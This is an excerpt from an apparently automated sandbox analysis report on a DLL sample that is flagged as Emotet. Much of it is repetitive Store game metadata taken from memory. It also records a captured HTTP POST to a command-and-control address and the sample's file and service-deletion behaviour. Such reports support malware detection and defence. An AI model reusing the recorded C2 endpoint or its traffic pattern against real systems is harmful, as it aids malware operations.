cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"plat
                    Source: svchost.exe, 0000000E.00000003.759251389.000001D9CB17B000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9c
c1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":374031458,"PackageFormat":"AppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.38.3802.0_neutral_~_ytsefhwckbdv6","PackageId":"a6dc1cf8-bc09-462b-7e62-6a662d08d291-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Universal"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.38.3802.0_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.38.3802.0_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"plat
                    Source: svchost.exe, 0000000E.00000003.759319799.000001D9CB19C000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
                    Source: svchost.exe, 0000000E.00000003.759319799.000001D9CB19C000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
                    Source: svchost.exe, 0000000E.00000003.759319799.000001D9CB19C000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
                    Source: unknown
                    HTTP traffic detected:
                    POST /2ijyf1/txor3som/z3prsr3ev/l8z0/1k9au09l0vb/ HTTP/1.1
                    DNT: 0
                    Referer: 203.157.152.9/2ijyf1/txor3som/z3prsr3ev/l8z0/1k9au09l0vb/
                    Content-Type: multipart/form-data; boundary=---------FFexYarq3
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                    Host: 203.157.152.9:7080
                    Content-Length: 6212
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Source: svchost.exe, 0000000E.00000002.780274733.000001D9CB13C000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                    Source: svchost.exe, 0000000E.00000002.780274733.000001D9CB13C000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                    Source: svchost.exe, 0000000E.00000002.780274733.000001D9CB13C000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: svchost.exe, 0000000E.00000002.780274733.000001D9CB13C000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0
                    Source: svchost.exe, 0000000E.00000003.759251389.000001D9CB17B000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
                    Source: svchost.exe, 0000000E.00000003.759251389.000001D9CB17B000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/termsofservice
                    Source: svchost.exe, 0000000E.00000003.758023398.000001D9CB17B000.00000004.00000001.sdmp String found in binary or memory: http://www.hulu.com/privacy
                    Source: svchost.exe, 0000000E.00000003.758023398.000001D9CB17B000.00000004.00000001.sdmp String found in binary or memory: http://www.hulu.com/terms
                    Source: svchost.exe, 0000000E.00000003.766031353.000001D9CB130000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.766166337.000001D9CB185000.00000004.00000001.sdmp String found in binary or memory: https://corp.roblox.com/contact/
                    Source: svchost.exe, 0000000E.00000003.766254523.000001D9CB163000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.766166337.000001D9CB185000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.766055144.000001D9CB16C000.00000004.00000001.sdmp String found in binary or memory: https://corp.roblox.com/parents/
                    Source: svchost.exe, 0000000E.00000003.766031353.000001D9CB130000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.766166337.000001D9CB185000.00000004.00000001.sdmp String found in binary or memory: https://en.help.roblox.com/hc/en-us
                    Source: svchost.exe, 0000000E.00000003.759251389.000001D9CB17B000.00000004.00000001.sdmp String found in binary or memory: https://instagram.com/hiddencity_
                    Source: svchost.exe, 0000000E.00000003.758023398.000001D9CB17B000.00000004.00000001.sdmp String found in binary or memory: https://www.hulu.com/ca-privacy-rights
                    Source: svchost.exe, 0000000E.00000003.758023398.000001D9CB17B000.00000004.00000001.sdmp String found in binary or memory: https://www.hulu.com/do-not-sell-my-info
                    Source: svchost.exe, 0000000E.00000003.766031353.000001D9CB130000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.766166337.000001D9CB185000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/develop
                    Source: svchost.exe, 0000000E.00000003.766031353.000001D9CB130000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.766166337.000001D9CB185000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/info/privacy

                    E-Banking Fraud:

                    Yara detected Emotet
                    Source: Yara match; File source: zGeK5so94c.dll, type: SAMPLE
                    Source: Yara match; File source: 00000005.00000002.679972484.00000000729E1000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000004.00000002.678150026.00000000729E1000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000007.00000002.773552883.00000000729E1000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000006.00000002.680588418.00000000729E1000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara match; File source: 6.2.rundll32.exe.729e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.2.rundll32.exe.729e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 7.2.rundll32.exe.729e0000.2.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.2.rundll32.exe.729e0000.1.unpack, type: UNPACKEDPE

                    System Summary:

                    Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 16_2_6F545CE0 GetModuleFileNameW, PathFindFileNameW, OpenSCManagerW, OpenServiceW, DeleteService, CloseHandle, RegCreateKeyExW, RegDeleteValueW, CloseHandle, MoveFileW, ExitProcess
                    Source: C:\Windows\SysWOW64\rundll32.exe; File created: C:\Windows\SysWOW64\Hbjpd\
                    Source: C:\Windows\SysWOW64\rundll32.exe; File deleted: C:\Windows\SysWOW64\Hbjpd\usib.lxs:Zone.Identifier
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036FD77E18_2_036FD77E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036FED7118_2_036FED71
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_03709B5918_2_03709B59
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036F2B2B18_2_036F2B2B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036F7D0718_2_036F7D07
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036F83CE18_2_036F83CE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_037053C018_2_037053C0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_036FCDD818_2_036FCDD8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_